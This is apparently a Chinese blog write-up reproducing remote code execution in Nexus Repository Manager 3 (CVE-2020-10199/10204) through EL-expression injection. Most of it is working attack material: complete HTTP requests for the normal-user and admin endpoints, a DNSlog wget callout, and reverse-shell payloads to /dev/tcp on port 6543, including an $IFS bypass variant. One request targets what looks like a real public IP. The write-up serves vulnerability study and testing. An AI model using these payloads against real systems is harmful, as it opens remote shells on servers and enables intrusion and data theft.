Nexus Repository Manager 3 RCE (CVE-2020-10199/10204) 复现

0x00 前言

本次漏洞复现使用

0x01 描述

Nexus Repository Manager 3 是一款软件仓库，可以用来存储和分发 Maven 、 NuGET 等软件源仓库

Nexus Repository Manager官方发布了CVE-2020-10199，CVE-2020-10204的漏洞公告，10199的漏洞需要普通用户权限即可触发，而10204则需要管理员权限。两个漏洞的触发原因均是不安全的执行EL表达式导致的

影响版本

Nexus Repository Manager OSS/Pro 3.x <= 3.21.1

默认端口：

8081    Sonatype Nexus Repository 管理页面

复现准备

启动环境

image

每次启动环境映射的端口都不同，按照实际映射端口访问就可以看到Web界面了

image

预留的用户名/密码：

admin/admin

0x02 漏洞复现（普通账号执行方法）

此方法普通账号和管理员账号皆适用

image

登陆后替换Cookie和CSRF Token，发送数据包，即可执行EL表达式

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 203
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=cedf848f-d881-4b58-ac24-9e9c3ece40bc
Connection: close

{
  "name": "internal",
  "online": true,
  "storage": {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group": {
    "memberNames": ["$\\A{233*233*233}"]
  }
}

image

DNSlog 测试

进行 DNSlog 尝试，开始尝试使用 ping 、curl 都无法成功执行 EL 表达式，最后尝试使用了 wget 命令成功获取请求记录

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('wget hvqkwp.dnslog.cn')}

image

反弹shell

开始直接使用下面语句进行反弹并无任何反应

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('bash -i >& /dev/tcp/xx.xx.xx.xx/6543 0>&1')}

经过资料查阅，发现了存在的问题：

https://blog.spoock.com/2018/11/25/getshell-bypass-exec/

经过多次尝试，最终的payload

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/xx.xx.xx.xx/6543 0>&1')}

image

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c bash$IFS$9-i>&/dev/tcp/xx.xx.xx.xx/6543<&1')}

image

2.3 漏洞复现（管理员账号执行方法）

此方法只适用于管理员账号

POST /service/extdirect HTTP/1.1
Host: 118.193.36.37:64521
Content-Length: 290
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.8501743136715239
Content-Type: application/json
Accept: */*
Origin: http://118.193.36.37:64521
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://118.193.36.37:64521/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.8501743136715239; _ga=GA1.1.1177666056.1593768292; _gid=GA1.1.174097340.1593768292; NXSESSIONID=8c94eba8-2764-4b02-801f-e4c58769cb4d
Connection: close

{"action":"coreui_Role","method":"create","data":[{"version":"","source":"default","id":"1111","name":"2222","description":"3333","privileges":["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('wget im87gx.dnslog.cn')}"],"roles":[]}],"type":"rpc","tid":89}

注意替换 Cookie 和 CSRF-TOKEN

image

最后编辑于：2020.07.29 00:45:14